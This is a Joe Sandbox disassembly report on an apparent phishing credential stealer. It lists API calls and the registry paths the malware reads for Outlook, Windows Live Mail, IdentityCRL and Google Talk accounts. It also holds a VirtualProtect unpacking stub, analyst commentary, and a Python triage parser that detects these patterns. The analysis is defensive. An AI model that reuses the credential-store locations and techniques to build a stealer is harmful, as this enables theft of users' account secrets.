                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                                          • API String ID: 1197458902-317895162
                                                                                                                                                                                                                                          • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

Control-flow Graph (rendered image; basic blocks 44b49f-44b4b0 and 444c68-444e0f, entry block: call 444e38, GetModuleHandleA)
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID: h4ND
• API String ID: 3662548030-3825183422
• Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
• Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
• Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
• Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

Control-flow Graph (rendered image; basic blocks 40fb00-40fc3d, entry block: call 44b090, RegOpenKeyExA)
APIs
• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
• RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
• RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
• RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
• memcpy.MSVCRT(?,?,?), ref: 0040FBF9
  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
• LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
• RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
• String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
• API String ID: 2768085393-1693574875
• Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
• Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
• Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
• Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

Control-flow Graph

APIs
• memset.MSVCRT ref: 0044430B
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
• memset.MSVCRT ref: 00444379
• memset.MSVCRT ref: 00444394
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
• strlen.MSVCRT ref: 004443DB
• _strcmpi.MSVCRT ref: 00444401
Strings
• Software\Microsoft\Windows Live Mail, xrefs: 004443AA
• \Microsoft\Windows Mail, xrefs: 00444329
• \Microsoft\Windows Live Mail, xrefs: 00444350
• Store Root, xrefs: 004443A5
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
• String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
• API String ID: 832325562-2578778931
• Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
• Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

Control-flow Graph (graph image not extracted): basic blocks 40f460-40f6df; calls memset * 2, 4078ba * 2, RegOpenKeyExA, RegQueryValueExA (x2), 40466b, 404734, 4047a5, 404785, 4012ee, memcpy, LocalFree, RegCloseKey
APIs
• memset.MSVCRT ref: 0040F567
• memset.MSVCRT ref: 0040F57F
  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
• RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
• LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
• String ID:
• API String ID: 2012582556-3916222277
• Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
• Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
• Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
• Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

Control-flow Graph (graph image not extracted): basic blocks 4037ca-4038e5; calls memset * 2, 444551, 4021b6, 406f06 * 2, strchr, _mbscpy (x2), strlen, sprintf, 4023e5
APIs
• memset.MSVCRT ref: 004037EB
• memset.MSVCRT ref: 004037FF
  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
• strchr.MSVCRT ref: 0040386E
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
• strlen.MSVCRT ref: 00403897
• sprintf.MSVCRT ref: 004038B7
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
• String ID: %s@yahoo.com
• API String ID: 317221925-3288273942
• Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
• Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
• Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
• Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

Control-flow Graph (graph image not extracted): basic blocks 4034e4-403582; calls memset * 2, 410b1e, _mbscpy, 406d55, _mbscat, 4033f0
APIs
• memset.MSVCRT ref: 00403504
• memset.MSVCRT ref: 0040351A
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 0040356D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _mbscatmemset$Close_mbscpystrlen
• String ID: InstallPath$Software\Group Mail$fb.dat
• API String ID: 3071782539-966475738
• Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
• Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
• Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
• Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

Control-flow Graph (graph image not extracted): basic blocks 40ccd7-40cdd9; calls ??2@YAPAXI@Z * 2, 404025, DeleteObject, 407088, 4019b5 * 2, memset, LoadIconA, _mbscpy
APIs
• ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
• ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
• DeleteObject.GDI32(?), ref: 0040CD5A
• memset.MSVCRT ref: 0040CD96
• LoadIconA.USER32(00000065), ref: 0040CDA6
• _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2054149589-0
                                                                                                                                                                                                                                          • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

Control-flow Graph

control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 376 44b457-44b45b 374->376 385 44b48d 375->385 386 44b428-44b433 GetProcAddress 375->386 378 44b45d-44b465 GetModuleHandleA 376->378 379 44b49a call 44b49f 376->379 381 44b467-44b46f 378->381 381->381 384 44b471-44b474 381->384 384->376 387 44b476-44b478 384->387 388 44b48e-44b496 385->388 386->374 389 44b435-44b442 VirtualProtect 386->389 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->385 397->384
APIs
• GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
• GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
• Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
• Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
• Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
Read together: the function resolves an export by name (GetModuleHandleA, GetProcAddress), then the subcall at 0044B42B makes a 0x78-byte region writable with VirtualProtect(?, 0x78, PAGE_READWRITE = 0x4, ...) and, in the very next basic block, calls VirtualProtect on the same size again with an unresolved protection value, which is what putting the saved old protection back looks like in this log. That make-writable, patch, restore sequence changes the rights of already-mapped PE memory at run time and is how an unpacker or hooking stub typically rewrites code or import entries in place; the 0x78-byte size and the unresolved target address are the values to pin down in a debugger.
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

Control-flow Graph

APIs
• Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
• Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
• Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
• Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
• Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
• Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
• Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
• Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
• memset.MSVCRT ref: 00408620
• Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• memset.MSVCRT ref: 00408671
• RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
• RegCloseKey.ADVAPI32(?), ref: 004086D6
Read together: the subcall at 004082CD collects the host and user names (GetComputerNameA, GetUserNameA) and converts them to wide strings; 00410A9C opens HKLM (0x80000002) ...\CurrentVersion\Explorer\Shell Folders, the key that maps well-known folder names to on-disk paths, with KEY_READ (0x20019); and 00410B62 walks subkeys with RegEnumKeyExA. The only string this function references is Software\Google\Google Talk\Accounts, the per-account store of the Google Talk client, so the enumeration is instant-messenger account harvesting rather than ordinary configuration access, and the host/user pair is the label the stolen entries are tagged with.
Strings
• Software\Google\Google Talk\Accounts, xrefs: 004085F1
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 1366857005-1079885057
• Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
• Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
• Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
• Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
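The two function blocks above (the VirtualProtect patch-and-restore stub at 0044B40E and the Google Talk registry walker) are the kind of listing an analyst triages by hand across hundreds of functions. The following parser turns the report's "APIs" and "Strings" bullet lines into records and applies the three checks those blocks motivate: a VirtualProtect that makes a region writable (or RWX) followed by a restore, RegOpenKeyEx against a known credential store, and GetComputerNameA plus GetUserNameA fingerprinting. This is an added example written for this page, not code from the report or from Joe Sandbox; the line formats are those visible above, the sample inputs are copied from the two blocks, and the CRED_STORE_KEYS table holds only the store this report exposes (an assumption you would extend for your own triage).

```python
"""Triage helper for the "APIs" / "Strings" bullet lists of a Joe Sandbox
function block (added example; not code from the report or from Joe Sandbox)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# APIs bullet: [Part of subcall function X: ]Api.Module(args), ref: ADDR
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]+)\s*$")
# Strings bullet: value, xrefs: ADDR
STRING_LINE = re.compile(r"^(?P<value>.+?), xrefs: (?P<xrefs>[0-9A-Fa-f ,]+)$")
PAGE_READWRITE, PAGE_EXECUTE_READWRITE, KEY_READ = 0x04, 0x40, 0x20019
HIVES = {0x80000001: "HKCU", 0x80000002: "HKLM"}
# Credential-store key fragments, lower-case. Assumed list: only the store
# this report exposes is included; extend it for your own triage.
CRED_STORE_KEYS = {"google talk\\accounts": "Google Talk IM account store"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:
        return None  # Joe Sandbox prints '?' for values it could not resolve

def parse_block(text: str) -> FunctionBlock:
    """Parse the bullet lines of one function block into calls and strings."""
    block = FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := API_LINE.match(line):
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            block.calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                       m.group("ref").upper(), m.group("sub")))
        elif m := STRING_LINE.match(line):
            block.strings.append(m.group("value"))
    return block

def triage(block: FunctionBlock) -> dict:
    """Protection changes, registry credential stores, host/user fingerprinting."""
    out = {"protection_changes": [], "registry_keys": [], "credential_stores": []}
    for c in block.calls:
        if c.api == "VirtualProtect" and len(c.args) >= 3:
            # Prototype order holds for this call: lpAddress, dwSize, flNewProtect, ...
            size, prot = _hex(c.args[1]), _hex(c.args[2])
            if prot == PAGE_READWRITE:
                out["protection_changes"].append((c.ref, size, "PAGE_READWRITE"))
            elif prot == PAGE_EXECUTE_READWRITE:
                out["protection_changes"].append((c.ref, size, "PAGE_EXECUTE_READWRITE"))
            elif prot is None and out["protection_changes"]:
                # Unresolved flNewProtect after a make-writable call: the saved
                # old protection being put back (patch-and-restore).
                out["protection_changes"].append((c.ref, size, "restore(?)"))
        elif c.api.startswith("RegOpenKeyEx") and c.args:
            # The sandbox dumps raw stack slots, so find the sub-key string by
            # content (it contains a backslash) rather than by position.
            hive = HIVES.get(_hex(c.args[0]), c.args[0])
            access = "KEY_READ" if f"{KEY_READ:08X}" in c.args else "?"
            for a in c.args:
                if "\\" in a:
                    out["registry_keys"].append((c.ref, f"{hive}\\{a}", access))
    for key in [k for _, k, _ in out["registry_keys"]] + block.strings:
        for frag, label in CRED_STORE_KEYS.items():
            if frag in key.lower():
                out["credential_stores"].append((key, label))
    apis = {c.api for c in block.calls}
    out["fingerprints_host"] = {"GetComputerNameA", "GetUserNameA"} <= apis
    return out

# Sample inputs constructed from the two function blocks of this report.
SAMPLE_UNPACK_44B40E = r"""
• GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
• GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
• Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
• Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
• Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
"""
SAMPLE_CREDS_GTALK = r"""
• Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
• Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
• Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
• Software\Google\Google Talk\Accounts, xrefs: 004085F1
"""
```

Run `triage(parse_block(text))` over each block pasted from the report; for the stub at 0044B40E it returns the PAGE_READWRITE call at 0044B43E followed by the unresolved restore at 0044B452, and for the registry walker it returns the HKLM Shell Folders open with KEY_READ, the Google Talk account store from the Strings section, and the host/user fingerprint flag. The positional caveat matters: Joe Sandbox argument lists are dumped stack slots, so only the VirtualProtect decoding relies on prototype order, and the registry check scans the slots for the string instead.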

Control-flow Graph

control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 435 40ba74 428->435 436 40ba6f-40ba72 428->436 429->422 429->423 430 40baa0-40bab3 call 407e30 437 40bab5-40bac1 430->437 438 40bafa-40bb09 SetCursor 430->438 439 40ba75-40ba76 call 40b5e5 435->439 436->439 441 40bac3-40bace 437->441 442 40bad8-40baf7 qsort 437->442 439->429 441->429 442->438 445->430 446->430 447->430 448->430 449->430
Read together: the loop over 40ba3c-40ba85 compares command-line tokens case-insensitively (_mbsicmp) against /sort and /nosort, the collected entries are ordered with qsort on the 40bad8 path when sorting is enabled, and SetCursor is called on the way out at 40bafa. /sort and /nosort are the switches NirSoft's password-recovery utilities accept, so this is the command-line handling of an embedded recovery tool rather than code written for this sample; the five alternative targets at 40ba9d are the collection routines it dispatches to.
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Cursor_mbsicmpqsort
• String ID: /nosort$/sort
• API String ID: 882979914-1578091866
• Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
